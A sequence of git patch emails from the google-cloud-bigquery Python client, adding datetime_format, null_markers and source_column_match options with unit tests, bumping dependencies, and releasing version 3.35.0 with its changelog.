@@ -26,6 +26,7 @@ class TestExternalConfig(unittest.TestCase): SOURCE_URIS = ["gs://foo", "gs://bar"] DATE_FORMAT = "MM/DD/YYYY" + DATETIME_FORMAT = "MM/DD/YYYY HH24:MI:SS" TIME_ZONE = "America/Los_Angeles" TIME_FORMAT = "HH24:MI:SS" TIMESTAMP_FORMAT = "MM/DD/YYYY HH24:MI:SS.FF6 TZR" @@ -38,6 +39,7 @@ class 
TestExternalConfig(unittest.TestCase): "ignoreUnknownValues": False, "compression": "compression", "dateFormat": DATE_FORMAT, + "datetimeFormat": DATETIME_FORMAT, "timeZone": TIME_ZONE, "timeFormat": TIME_FORMAT, "timestampFormat": TIMESTAMP_FORMAT, @@ -88,6 +90,7 @@ def test_to_api_repr_base(self): ec.schema = [schema.SchemaField("full_name", "STRING", mode="REQUIRED")] ec.date_format = self.DATE_FORMAT + ec.datetime_format = self.DATETIME_FORMAT ec.time_zone = self.TIME_ZONE ec.time_format = self.TIME_FORMAT ec.timestamp_format = self.TIMESTAMP_FORMAT @@ -106,6 +109,7 @@ def test_to_api_repr_base(self): "connectionId": "path/to/connection", "schema": exp_schema, "dateFormat": self.DATE_FORMAT, + "datetimeFormat": self.DATETIME_FORMAT, "timeZone": self.TIME_ZONE, "timeFormat": self.TIME_FORMAT, "timestampFormat": self.TIMESTAMP_FORMAT, @@ -145,6 +149,7 @@ def _verify_base(self, ec): self.assertEqual(ec.max_bad_records, 17) self.assertEqual(ec.source_uris, self.SOURCE_URIS) self.assertEqual(ec.date_format, self.DATE_FORMAT) + self.assertEqual(ec.datetime_format, self.DATETIME_FORMAT) self.assertEqual(ec.time_zone, self.TIME_ZONE) self.assertEqual(ec.time_format, self.TIME_FORMAT) self.assertEqual(ec.timestamp_format, self.TIMESTAMP_FORMAT) From 69a2c2bfd89914605d53aefc78bd6e45c38c578f Mon Sep 17 00:00:00 2001 From: Mend Renovate Date: Tue, 15 Jul 2025 11:43:28 +0200 Subject: [PATCH 147/202] chore(deps): update dependency certifi to v2025.7.14 (#2237) Co-authored-by: Chalmer Lowe --- samples/geography/requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/samples/geography/requirements.txt b/samples/geography/requirements.txt index 447e92c81..e932625b8 100644 --- a/samples/geography/requirements.txt +++ b/samples/geography/requirements.txt @@ -1,5 +1,5 @@ attrs==25.3.0 -certifi==2025.7.9 +certifi==2025.7.14 cffi==1.17.1 charset-normalizer==3.4.2 click===8.1.8; python_version == '3.9' From 289446dd8c356d11a0b63b8e6275629b1ae5dc08 Mon Sep 
17 00:00:00 2001 From: Chalmer Lowe Date: Tue, 15 Jul 2025 14:32:47 -0400 Subject: [PATCH 148/202] feat: Add null_markers property to LoadJobConfig and CSVOptions (#2239) * feat: Add null_markers property to LoadJobConfig and CSVOptions * feat: adds null_markers as a load and external_config option --------- Co-authored-by: google-labs-jules[bot] <161369871+google-labs-jules[bot]@users.noreply.github.com> --- google/cloud/bigquery/external_config.py | 21 ++++++++++++++++++ google/cloud/bigquery/job/load.py | 28 ++++++++++++++++++++++++ tests/unit/job/test_load.py | 7 ++++++ tests/unit/job/test_load_config.py | 16 ++++++++++++++ tests/unit/test_external_config.py | 4 ++++ 5 files changed, 76 insertions(+) diff --git a/google/cloud/bigquery/external_config.py b/google/cloud/bigquery/external_config.py index 82c6a9e75..69ed72bc9 100644 --- a/google/cloud/bigquery/external_config.py +++ b/google/cloud/bigquery/external_config.py @@ -474,6 +474,27 @@ def skip_leading_rows(self): def skip_leading_rows(self, value): self._properties["skipLeadingRows"] = str(value) + @property + def null_markers(self) -> Optional[Iterable[str]]: + """Optional[Iterable[str]]: A list of strings represented as SQL NULL values in a CSV file. + + .. note:: + null_marker and null_markers can't be set at the same time. + If null_marker is set, null_markers has to be not set. + If null_markers is set, null_marker has to be not set. + If both null_marker and null_markers are set at the same time, a user error would be thrown. + Any strings listed in null_markers, including empty string would be interpreted as SQL NULL. + This applies to all column types. 
+ + See + https://cloud.google.com/bigquery/docs/reference/rest/v2/tables#CsvOptions.FIELDS.null_markers + """ + return self._properties.get("nullMarkers") + + @null_markers.setter + def null_markers(self, value: Optional[Iterable[str]]): + self._properties["nullMarkers"] = value + def to_api_repr(self) -> dict: """Build an API representation of this object. diff --git a/google/cloud/bigquery/job/load.py b/google/cloud/bigquery/job/load.py index 3be914f43..eabc12cfc 100644 --- a/google/cloud/bigquery/job/load.py +++ b/google/cloud/bigquery/job/load.py @@ -386,6 +386,27 @@ def null_marker(self): def null_marker(self, value): self._set_sub_prop("nullMarker", value) + @property + def null_markers(self) -> Optional[List[str]]: + """Optional[List[str]]: A list of strings represented as SQL NULL values in a CSV file. + + .. note:: + null_marker and null_markers can't be set at the same time. + If null_marker is set, null_markers has to be not set. + If null_markers is set, null_marker has to be not set. + If both null_marker and null_markers are set at the same time, a user error would be thrown. + Any strings listed in null_markers, including empty string would be interpreted as SQL NULL. + This applies to all column types. + + See: + https://cloud.google.com/bigquery/docs/reference/rest/v2/Job#JobConfigurationLoad.FIELDS.null_markers + """ + return self._get_sub_prop("nullMarkers") + + @null_markers.setter + def null_markers(self, value: Optional[List[str]]): + self._set_sub_prop("nullMarkers", value) + @property def preserve_ascii_control_characters(self): """Optional[bool]: Preserves the embedded ASCII control characters when sourceFormat is set to CSV. @@ -854,6 +875,13 @@ def null_marker(self): """ return self.configuration.null_marker + @property + def null_markers(self): + """See + :attr:`google.cloud.bigquery.job.LoadJobConfig.null_markers`. 
+ """ + return self.configuration.null_markers + @property def quote_character(self): """See diff --git a/tests/unit/job/test_load.py b/tests/unit/job/test_load.py index 7afe9cba6..5d52401c9 100644 --- a/tests/unit/job/test_load.py +++ b/tests/unit/job/test_load.py @@ -42,6 +42,7 @@ def _setUpConstants(self): self.TIME_ZONE = "UTC" self.TIME_FORMAT = "%H:%M:%S" self.TIMESTAMP_FORMAT = "YYYY-MM-DD HH:MM:SS.SSSSSSZ" + self.NULL_MARKERS = ["", "NA"] def _make_resource(self, started=False, ended=False): resource = super(TestLoadJob, self)._make_resource(started, ended) @@ -52,6 +53,7 @@ def _make_resource(self, started=False, ended=False): config["timeZone"] = self.TIME_ZONE config["timeFormat"] = self.TIME_FORMAT config["timestampFormat"] = self.TIMESTAMP_FORMAT + config["nullMarkers"] = self.NULL_MARKERS config["destinationTable"] = { "projectId": self.PROJECT, @@ -140,6 +142,10 @@ def _verifyResourceProperties(self, job, resource): self.assertEqual(job.null_marker, config["nullMarker"]) else: self.assertIsNone(job.null_marker) + if "nullMarkers" in config: + self.assertEqual(job.null_markers, config["nullMarkers"]) + else: + self.assertIsNone(job.null_markers) if "quote" in config: self.assertEqual(job.quote_character, config["quote"]) else: @@ -211,6 +217,7 @@ def test_ctor(self): self.assertIsNone(job.ignore_unknown_values) self.assertIsNone(job.max_bad_records) self.assertIsNone(job.null_marker) + self.assertIsNone(job.null_markers) self.assertIsNone(job.quote_character) self.assertIsNone(job.skip_leading_rows) self.assertIsNone(job.source_format) diff --git a/tests/unit/job/test_load_config.py b/tests/unit/job/test_load_config.py index dbb062486..8ff9244d2 100644 --- a/tests/unit/job/test_load_config.py +++ b/tests/unit/job/test_load_config.py @@ -469,6 +469,22 @@ def test_null_marker_setter(self): config.null_marker = null_marker self.assertEqual(config._properties["load"]["nullMarker"], null_marker) + def test_null_markers_missing(self): + config = 
self._get_target_class()() + self.assertIsNone(config.null_markers) + + def test_null_markers_hit(self): + null_markers = ["", "NA"] + config = self._get_target_class()() + config._properties["load"]["nullMarkers"] = null_markers + self.assertEqual(config.null_markers, null_markers) + + def test_null_markers_setter(self): + null_markers = ["", "NA"] + config = self._get_target_class()() + config.null_markers = null_markers + self.assertEqual(config._properties["load"]["nullMarkers"], null_markers) + def test_preserve_ascii_control_characters_missing(self): config = self._get_target_class()() self.assertIsNone(config.preserve_ascii_control_characters) diff --git a/tests/unit/test_external_config.py b/tests/unit/test_external_config.py index 3a441d1f5..61532b4b8 100644 --- a/tests/unit/test_external_config.py +++ b/tests/unit/test_external_config.py @@ -277,6 +277,7 @@ def test_from_api_repr_csv(self): "allowJaggedRows": False, "encoding": "encoding", "preserveAsciiControlCharacters": False, + "nullMarkers": ["", "NA"], }, }, ) @@ -293,6 +294,7 @@ def test_from_api_repr_csv(self): self.assertEqual(ec.options.allow_jagged_rows, False) self.assertEqual(ec.options.encoding, "encoding") self.assertEqual(ec.options.preserve_ascii_control_characters, False) + self.assertEqual(ec.options.null_markers, ["", "NA"]) got_resource = ec.to_api_repr() @@ -314,6 +316,7 @@ def test_to_api_repr_csv(self): options.skip_leading_rows = 123 options.allow_jagged_rows = False options.preserve_ascii_control_characters = False + options.null_markers = ["", "NA"] ec.csv_options = options exp_resource = { @@ -326,6 +329,7 @@ def test_to_api_repr_csv(self): "allowJaggedRows": False, "encoding": "encoding", "preserveAsciiControlCharacters": False, + "nullMarkers": ["", "NA"], }, } From 6d5d23685cd457d85955356705c1101e9ec3cdcd Mon Sep 17 00:00:00 2001 From: Chalmer Lowe Date: Tue, 15 Jul 2025 18:04:24 -0400 Subject: [PATCH 149/202] feat: Adds source_column_match and associated tests (#2227) This 
commit introduces new configuration options for BigQuery load jobs and external table definitions, aligning with recent updates to the underlying protos. New options added: - `source_column_name_match_option`: Controls how source columns are matched to the schema. (Applies to LoadJobConfig, ExternalConfig, LoadJob) Changes include: - Added corresponding properties (getters/setters) to `LoadJobConfig`, `LoadJob`, `ExternalConfig`, and `CSVOptions`. - Updated docstrings and type hints for all new attributes. - Updated unit tests to cover the new options, ensuring they are correctly handled during object initialization, serialization to API representation, and deserialization from API responses. --- google/cloud/bigquery/enums.py | 18 ++++++++++ google/cloud/bigquery/external_config.py | 34 +++++++++++++++++++ google/cloud/bigquery/job/load.py | 43 +++++++++++++++++++++++- tests/unit/job/test_load.py | 15 +++++++++ tests/unit/job/test_load_config.py | 32 ++++++++++++++++++ tests/unit/test_external_config.py | 43 +++++++++++++++++++++++- 6 files changed, 183 insertions(+), 2 deletions(-) diff --git a/google/cloud/bigquery/enums.py b/google/cloud/bigquery/enums.py index 9a1e4880c..1b1eb241a 100644 --- a/google/cloud/bigquery/enums.py +++ b/google/cloud/bigquery/enums.py @@ -462,3 +462,21 @@ class JobCreationMode(object): The conditions under which BigQuery can decide to not create a Job are subject to change. """ + + +class SourceColumnMatch(str, enum.Enum): + """Uses sensible defaults based on how the schema is provided. + If autodetect is used, then columns are matched by name. Otherwise, columns + are matched by position. This is done to keep the behavior backward-compatible. + """ + + SOURCE_COLUMN_MATCH_UNSPECIFIED = "SOURCE_COLUMN_MATCH_UNSPECIFIED" + """Unspecified column name match option.""" + + POSITION = "POSITION" + """Matches by position. This assumes that the columns are ordered the same + way as the schema.""" + + NAME = "NAME" + """Matches by name. 
This reads the header row as column names and reorders + columns to match the field names in the schema.""" diff --git a/google/cloud/bigquery/external_config.py b/google/cloud/bigquery/external_config.py index 69ed72bc9..dc7a33e6a 100644 --- a/google/cloud/bigquery/external_config.py +++ b/google/cloud/bigquery/external_config.py @@ -30,6 +30,7 @@ from google.cloud.bigquery._helpers import _int_or_none from google.cloud.bigquery._helpers import _str_or_none from google.cloud.bigquery import _helpers +from google.cloud.bigquery.enums import SourceColumnMatch from google.cloud.bigquery.format_options import AvroOptions, ParquetOptions from google.cloud.bigquery import schema from google.cloud.bigquery.schema import SchemaField @@ -474,6 +475,39 @@ def skip_leading_rows(self): def skip_leading_rows(self, value): self._properties["skipLeadingRows"] = str(value) + @property + def source_column_match(self) -> Optional[SourceColumnMatch]: + """Optional[google.cloud.bigquery.enums.SourceColumnMatch]: Controls the + strategy used to match loaded columns to the schema. If not set, a sensible + default is chosen based on how the schema is provided. If autodetect is + used, then columns are matched by name. Otherwise, columns are matched by + position. This is done to keep the behavior backward-compatible. + + Acceptable values are: + + SOURCE_COLUMN_MATCH_UNSPECIFIED: Unspecified column name match option. + POSITION: matches by position. This assumes that the columns are ordered + the same way as the schema. + NAME: matches by name. This reads the header row as column names and + reorders columns to match the field names in the schema. 
+ + See + https://cloud.google.com/bigquery/docs/reference/rest/v2/tables#CsvOptions.FIELDS.source_column_match + """ + + value = self._properties.get("sourceColumnMatch") + return SourceColumnMatch(value) if value is not None else None + + @source_column_match.setter + def source_column_match(self, value: Union[SourceColumnMatch, str, None]): + if value is not None and not isinstance(value, (SourceColumnMatch, str)): + raise TypeError( + "value must be a google.cloud.bigquery.enums.SourceColumnMatch, str, or None" + ) + if isinstance(value, SourceColumnMatch): + value = value.value + self._properties["sourceColumnMatch"] = value if value else None + @property def null_markers(self) -> Optional[Iterable[str]]: """Optional[Iterable[str]]: A list of strings represented as SQL NULL values in a CSV file. diff --git a/google/cloud/bigquery/job/load.py b/google/cloud/bigquery/job/load.py index eabc12cfc..8cdb779ac 100644 --- a/google/cloud/bigquery/job/load.py +++ b/google/cloud/bigquery/job/load.py @@ -15,9 +15,10 @@ """Classes for load jobs.""" import typing -from typing import FrozenSet, List, Iterable, Optional +from typing import FrozenSet, List, Iterable, Optional, Union from google.cloud.bigquery.encryption_configuration import EncryptionConfiguration +from google.cloud.bigquery.enums import SourceColumnMatch from google.cloud.bigquery.external_config import HivePartitioningOptions from google.cloud.bigquery.format_options import ParquetOptions from google.cloud.bigquery import _helpers @@ -569,6 +570,39 @@ def source_format(self): def source_format(self, value): self._set_sub_prop("sourceFormat", value) + @property + def source_column_match(self) -> Optional[SourceColumnMatch]: + """Optional[google.cloud.bigquery.enums.SourceColumnMatch]: Controls the + strategy used to match loaded columns to the schema. If not set, a sensible + default is chosen based on how the schema is provided. If autodetect is + used, then columns are matched by name. 
Otherwise, columns are matched by + position. This is done to keep the behavior backward-compatible. + + Acceptable values are: + + SOURCE_COLUMN_MATCH_UNSPECIFIED: Unspecified column name match option. + POSITION: matches by position. This assumes that the columns are ordered + the same way as the schema. + NAME: matches by name. This reads the header row as column names and + reorders columns to match the field names in the schema. + + See: + + https://cloud.google.com/bigquery/docs/reference/rest/v2/Job#JobConfigurationLoad.FIELDS.source_column_match + """ + value = self._get_sub_prop("sourceColumnMatch") + return SourceColumnMatch(value) if value is not None else None + + @source_column_match.setter + def source_column_match(self, value: Union[SourceColumnMatch, str, None]): + if value is not None and not isinstance(value, (SourceColumnMatch, str)): + raise TypeError( + "value must be a google.cloud.bigquery.enums.SourceColumnMatch, str, or None" + ) + if isinstance(value, SourceColumnMatch): + value = value.value + self._set_sub_prop("sourceColumnMatch", value if value else None) + @property def date_format(self) -> Optional[str]: """Optional[str]: Date format used for parsing DATE values. @@ -983,6 +1017,13 @@ def clustering_fields(self): """ return self.configuration.clustering_fields + @property + def source_column_match(self) -> Optional[SourceColumnMatch]: + """See + :attr:`google.cloud.bigquery.job.LoadJobConfig.source_column_match`. 
+ """ + return self.configuration.source_column_match + @property def date_format(self): """See diff --git a/tests/unit/job/test_load.py b/tests/unit/job/test_load.py index 5d52401c9..b551d52dd 100644 --- a/tests/unit/job/test_load.py +++ b/tests/unit/job/test_load.py @@ -19,6 +19,7 @@ from .helpers import _Base from .helpers import _make_client +from google.cloud.bigquery.enums import SourceColumnMatch class TestLoadJob(_Base): @@ -37,6 +38,7 @@ def _setUpConstants(self): self.OUTPUT_BYTES = 23456 self.OUTPUT_ROWS = 345 self.REFERENCE_FILE_SCHEMA_URI = "gs://path/to/reference" + self.SOURCE_COLUMN_MATCH = "NAME" self.DATE_FORMAT = "%Y-%m-%d" self.DATETIME_FORMAT = "%Y-%m-%dT%H:%M:%S" self.TIME_ZONE = "UTC" @@ -48,6 +50,7 @@ def _make_resource(self, started=False, ended=False): resource = super(TestLoadJob, self)._make_resource(started, ended) config = resource["configuration"]["load"] config["sourceUris"] = [self.SOURCE1] + config["sourceColumnMatch"] = self.SOURCE_COLUMN_MATCH config["dateFormat"] = self.DATE_FORMAT config["datetimeFormat"] = self.DATETIME_FORMAT config["timeZone"] = self.TIME_ZONE @@ -189,6 +192,15 @@ def _verifyResourceProperties(self, job, resource): else: self.assertIsNone(job.timestamp_format) + if "sourceColumnMatch" in config: + # job.source_column_match will be an Enum, config[...] 
is a string + self.assertEqual( + job.source_column_match.value, + config["sourceColumnMatch"], + ) + else: + self.assertIsNone(job.source_column_match) + def test_ctor(self): client = _make_client(project=self.PROJECT) job = self._make_one(self.JOB_ID, [self.SOURCE1], self.TABLE_REF, client) @@ -231,6 +243,7 @@ def test_ctor(self): self.assertIsNone(job.clustering_fields) self.assertIsNone(job.schema_update_options) self.assertIsNone(job.reference_file_schema_uri) + self.assertIsNone(job.source_column_match) self.assertIsNone(job.date_format) self.assertIsNone(job.datetime_format) self.assertIsNone(job.time_zone) @@ -631,6 +644,7 @@ def test_begin_w_alternate_client(self): ] }, "schemaUpdateOptions": [SchemaUpdateOption.ALLOW_FIELD_ADDITION], + "sourceColumnMatch": self.SOURCE_COLUMN_MATCH, "dateFormat": self.DATE_FORMAT, "datetimeFormat": self.DATETIME_FORMAT, "timeZone": self.TIME_ZONE, @@ -665,6 +679,7 @@ def test_begin_w_alternate_client(self): config.write_disposition = WriteDisposition.WRITE_TRUNCATE config.schema_update_options = [SchemaUpdateOption.ALLOW_FIELD_ADDITION] config.reference_file_schema_uri = "gs://path/to/reference" + config.source_column_match = SourceColumnMatch(self.SOURCE_COLUMN_MATCH) config.date_format = self.DATE_FORMAT config.datetime_format = self.DATETIME_FORMAT config.time_zone = self.TIME_ZONE diff --git a/tests/unit/job/test_load_config.py b/tests/unit/job/test_load_config.py index 8ff9244d2..27d3cead1 100644 --- a/tests/unit/job/test_load_config.py +++ b/tests/unit/job/test_load_config.py @@ -844,6 +844,38 @@ def test_write_disposition_setter(self): config._properties["load"]["writeDisposition"], write_disposition ) + def test_source_column_match_missing(self): + config = self._get_target_class()() + self.assertIsNone(config.source_column_match) + + def test_source_column_match_hit(self): + from google.cloud.bigquery.enums import SourceColumnMatch + + option_enum = SourceColumnMatch.NAME + config = self._get_target_class()() + # 
Assume API stores the string value of the enum + config._properties["load"]["sourceColumnMatch"] = option_enum.value + self.assertEqual(config.source_column_match, option_enum) + + def test_source_column_match_setter(self): + from google.cloud.bigquery.enums import SourceColumnMatch + + option_enum = SourceColumnMatch.POSITION + config = self._get_target_class()() + config.source_column_match = option_enum + # Assert that the string value of the enum is stored + self.assertEqual( + config._properties["load"]["sourceColumnMatch"], option_enum.value + ) + option_str = "NAME" + config.source_column_match = option_str + self.assertEqual(config._properties["load"]["sourceColumnMatch"], option_str) + + def test_source_column_match_setter_invalid_type(self): + config = self._get_target_class()() + with self.assertRaises(TypeError): + config.source_column_match = 3.14 + def test_date_format_missing(self): config = self._get_target_class()() self.assertIsNone(config.date_format) diff --git a/tests/unit/test_external_config.py b/tests/unit/test_external_config.py index 61532b4b8..ea827a560 100644 --- a/tests/unit/test_external_config.py +++ b/tests/unit/test_external_config.py @@ -19,12 +19,14 @@ from google.cloud.bigquery import external_config from google.cloud.bigquery import schema +from google.cloud.bigquery.enums import SourceColumnMatch import pytest class TestExternalConfig(unittest.TestCase): SOURCE_URIS = ["gs://foo", "gs://bar"] + SOURCE_COLUMN_MATCH = SourceColumnMatch.NAME DATE_FORMAT = "MM/DD/YYYY" DATETIME_FORMAT = "MM/DD/YYYY HH24:MI:SS" TIME_ZONE = "America/Los_Angeles" @@ -277,6 +279,7 @@ def test_from_api_repr_csv(self): "allowJaggedRows": False, "encoding": "encoding", "preserveAsciiControlCharacters": False, + "sourceColumnMatch": self.SOURCE_COLUMN_MATCH, "nullMarkers": ["", "NA"], }, }, @@ -294,6 +297,10 @@ def test_from_api_repr_csv(self): self.assertEqual(ec.options.allow_jagged_rows, False) self.assertEqual(ec.options.encoding, "encoding") 
self.assertEqual(ec.options.preserve_ascii_control_characters, False) + self.assertEqual( + ec.options.source_column_match, + self.SOURCE_COLUMN_MATCH, + ) self.assertEqual(ec.options.null_markers, ["", "NA"]) got_resource = ec.to_api_repr() @@ -316,7 +323,9 @@ def test_to_api_repr_csv(self): options.skip_leading_rows = 123 options.allow_jagged_rows = False options.preserve_ascii_control_characters = False + options.source_column_match = self.SOURCE_COLUMN_MATCH options.null_markers = ["", "NA"] + ec.csv_options = options exp_resource = { @@ -329,6 +338,7 @@ def test_to_api_repr_csv(self): "allowJaggedRows": False, "encoding": "encoding", "preserveAsciiControlCharacters": False, + "sourceColumnMatch": self.SOURCE_COLUMN_MATCH, "nullMarkers": ["", "NA"], }, } @@ -881,7 +891,9 @@ def test_to_api_repr(self): ) -class CSVOptions(unittest.TestCase): +class TestCSVOptions(unittest.TestCase): + SOURCE_COLUMN_MATCH = SourceColumnMatch.NAME + def test_to_api_repr(self): options = external_config.CSVOptions() options.field_delimiter = "\t" @@ -891,6 +903,7 @@ def test_to_api_repr(self): options.allow_jagged_rows = False options.encoding = "UTF-8" options.preserve_ascii_control_characters = False + options.source_column_match = self.SOURCE_COLUMN_MATCH resource = options.to_api_repr() @@ -904,9 +917,37 @@ def test_to_api_repr(self): "allowJaggedRows": False, "encoding": "UTF-8", "preserveAsciiControlCharacters": False, + "sourceColumnMatch": self.SOURCE_COLUMN_MATCH, }, ) + def test_source_column_match_None(self): + ec = external_config.CSVOptions() + ec.source_column_match = None + expected = None + result = ec.source_column_match + self.assertEqual(expected, result) + + def test_source_column_match_valid_input(self): + ec = external_config.CSVOptions() + ec.source_column_match = SourceColumnMatch.NAME + expected = "NAME" + result = ec.source_column_match + self.assertEqual(expected, result) + + ec.source_column_match = "POSITION" + expected = "POSITION" + result = 
ec.source_column_match + self.assertEqual(expected, result) + + def test_source_column_match_invalid_input(self): + ec = external_config.CSVOptions() + with self.assertRaisesRegex( + TypeError, + "value must be a google.cloud.bigquery.enums.SourceColumnMatch, str, or None", + ): + ec.source_column_match = 3.14 + class TestGoogleSheetsOptions(unittest.TestCase): def test_to_api_repr(self): From ef49f739998120ef348ffafdb97c22bddb323e83 Mon Sep 17 00:00:00 2001 From: "release-please[bot]" <55107282+release-please[bot]@users.noreply.github.com> Date: Tue, 15 Jul 2025 20:29:42 -0400 Subject: [PATCH 150/202] chore(main): release 3.35.0 (#2207) Co-authored-by: release-please[bot] <55107282+release-please[bot]@users.noreply.github.com> --- CHANGELOG.md | 28 ++++++++++++++++++++++++++++ google/cloud/bigquery/version.py | 2 +- 2 files changed, 29 insertions(+), 1 deletion(-) diff --git a/CHANGELOG.md b/CHANGELOG.md index 3b29a6a41..e4574aa7a 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -5,6 +5,34 @@ [1]: https://pypi.org/project/google-cloud-bigquery/#history +## [3.35.0](https://github.com/googleapis/python-bigquery/compare/v3.34.0...v3.35.0) (2025-07-15) + + +### Features + +* Add null_markers property to LoadJobConfig and CSVOptions ([#2239](https://github.com/googleapis/python-bigquery/issues/2239)) ([289446d](https://github.com/googleapis/python-bigquery/commit/289446dd8c356d11a0b63b8e6275629b1ae5dc08)) +* Add total slot ms to RowIterator ([#2233](https://github.com/googleapis/python-bigquery/issues/2233)) ([d44bf02](https://github.com/googleapis/python-bigquery/commit/d44bf0231e6e96369e4e03667a3f96618fb664e2)) +* Add UpdateMode to update_dataset ([#2204](https://github.com/googleapis/python-bigquery/issues/2204)) ([eb9c2af](https://github.com/googleapis/python-bigquery/commit/eb9c2aff242c5107f968bbd8b6a9d30cecc877f6)) +* Adds dataset_view parameter to get_dataset method ([#2198](https://github.com/googleapis/python-bigquery/issues/2198)) 
([28a5750](https://github.com/googleapis/python-bigquery/commit/28a5750d455f0381548df6f9b1f7661823837d81)) +* Adds date_format to load job and external config ([#2231](https://github.com/googleapis/python-bigquery/issues/2231)) ([7d31828](https://github.com/googleapis/python-bigquery/commit/7d3182802deccfceb0646b87fc8d12275d0a569b)) +* Adds datetime_format as an option ([#2236](https://github.com/googleapis/python-bigquery/issues/2236)) ([54d3dc6](https://github.com/googleapis/python-bigquery/commit/54d3dc66244d50a031e3c80d43d372d2743ecbc3)) +* Adds source_column_match and associated tests ([#2227](https://github.com/googleapis/python-bigquery/issues/2227)) ([6d5d236](https://github.com/googleapis/python-bigquery/commit/6d5d23685cd457d85955356705c1101e9ec3cdcd)) +* Adds time_format and timestamp_format and associated tests ([#2238](https://github.com/googleapis/python-bigquery/issues/2238)) ([371ad29](https://github.com/googleapis/python-bigquery/commit/371ad292df537278767dba71d81822ed57dd8e7d)) +* Adds time_zone to external config and load job ([#2229](https://github.com/googleapis/python-bigquery/issues/2229)) ([b2300d0](https://github.com/googleapis/python-bigquery/commit/b2300d032843512b7e4a5703377632fe60ef3f8d)) + + +### Bug Fixes + +* Adds magics.context.project to eliminate issues with unit tests … ([#2228](https://github.com/googleapis/python-bigquery/issues/2228)) ([27ff3a8](https://github.com/googleapis/python-bigquery/commit/27ff3a89a5f97305fa3ff673aa9183baa7df200f)) +* Fix rows returned when both start_index and page_size are provided ([#2181](https://github.com/googleapis/python-bigquery/issues/2181)) ([45643a2](https://github.com/googleapis/python-bigquery/commit/45643a2e20ce5d503118522dd195aeca00dec3bc)) +* Make AccessEntry equality consistent with from_api_repr ([#2218](https://github.com/googleapis/python-bigquery/issues/2218)) ([4941de4](https://github.com/googleapis/python-bigquery/commit/4941de441cb32cabeb55ec0320f305fb62551155)) +* Update type 
hints for various BigQuery files ([#2206](https://github.com/googleapis/python-bigquery/issues/2206)) ([b863291](https://github.com/googleapis/python-bigquery/commit/b86329188ba35e61871db82ae1d95d2a576eed1b)) + + +### Documentation + +* Improve clarity of "Output Only" fields in Dataset class ([#2201](https://github.com/googleapis/python-bigquery/issues/2201)) ([bd5aba8](https://github.com/googleapis/python-bigquery/commit/bd5aba8ba40c2f35fb672a68eed11d6baedb304f)) + ## [3.34.0](https://github.com/googleapis/python-bigquery/compare/v3.33.0...v3.34.0) (2025-05-27) diff --git a/google/cloud/bigquery/version.py b/google/cloud/bigquery/version.py index 9e1393854..0107ae309 100644 --- a/google/cloud/bigquery/version.py +++ b/google/cloud/bigquery/version.py @@ -12,4 +12,4 @@ # See the License for the specific language governing permissions and # limitations under the License. -__version__ = "3.34.0" +__version__ = "3.35.0" From 4400f26dcb03826f835de8348aef25a0fcbf5115 Mon Sep 17 00:00:00 2001 From: Mend Renovate Date: Wed, 16 Jul 2025 19:22:36 +0200 Subject: [PATCH 151/202] chore(deps): update all dependencies to v3.35.0 (#2242) --- samples/desktopapp/requirements.txt | 2 +- samples/geography/requirements.txt | 2 +- samples/magics/requirements.txt | 2 +- samples/notebooks/requirements.txt | 2 +- samples/snippets/requirements.txt | 2 +- 5 files changed, 5 insertions(+), 5 deletions(-) diff --git a/samples/desktopapp/requirements.txt b/samples/desktopapp/requirements.txt index a512dbd3a..54b708ca8 100644 --- a/samples/desktopapp/requirements.txt +++ b/samples/desktopapp/requirements.txt @@ -1,2 +1,2 @@ -google-cloud-bigquery==3.34.0 +google-cloud-bigquery==3.35.0 google-auth-oauthlib==1.2.2 diff --git a/samples/geography/requirements.txt b/samples/geography/requirements.txt index e932625b8..5b85a9bfe 100644 --- a/samples/geography/requirements.txt +++ b/samples/geography/requirements.txt @@ -13,7 +13,7 @@ geopandas===1.0.1; python_version <= '3.9' geopandas==1.1.1; 
python_version >= '3.10' google-api-core==2.25.1 google-auth==2.40.3 -google-cloud-bigquery==3.34.0 +google-cloud-bigquery==3.35.0 google-cloud-bigquery-storage==2.32.0 google-cloud-core==2.4.3 google-crc32c==1.7.1 diff --git a/samples/magics/requirements.txt b/samples/magics/requirements.txt index b53a35982..5c48d707f 100644 --- a/samples/magics/requirements.txt +++ b/samples/magics/requirements.txt @@ -1,6 +1,6 @@ bigquery_magics==0.10.1 db-dtypes==1.4.3 -google.cloud.bigquery==3.34.0 +google.cloud.bigquery==3.35.0 google-cloud-bigquery-storage==2.32.0 ipython===8.18.1 pandas==2.3.1 diff --git a/samples/notebooks/requirements.txt b/samples/notebooks/requirements.txt index 4b134ac9d..88f725bb4 100644 --- a/samples/notebooks/requirements.txt +++ b/samples/notebooks/requirements.txt @@ -1,6 +1,6 @@ bigquery-magics==0.10.1 db-dtypes==1.4.3 -google-cloud-bigquery==3.34.0 +google-cloud-bigquery==3.35.0 google-cloud-bigquery-storage==2.32.0 ipython===8.18.1; python_version == '3.9' ipython==9.4.0; python_version >= '3.10' diff --git a/samples/snippets/requirements.txt b/samples/snippets/requirements.txt index fd8bd672b..e43cb04e9 100644 --- a/samples/snippets/requirements.txt +++ b/samples/snippets/requirements.txt @@ -1,2 +1,2 @@ # samples/snippets should be runnable with no "extras" -google-cloud-bigquery==3.34.0 +google-cloud-bigquery==3.35.0 From d207f6539b7a4c248a5de5719d7f384abbe20abe Mon Sep 17 00:00:00 2001 From: shollyman Date: Mon, 21 Jul 2025 17:34:50 -0500 Subject: [PATCH 152/202] docs: specify the inherited-members directive for job classes (#2244) It seems that versions of python earlier than 3.10 may have had issues processing inherited members annotations, and accidentally include inherited members by default. As we recently worked to excise older versions of python in this repo, it seems we're now correctly processing sphinx directives, which means we no longer emit docstrings for inherited members. 
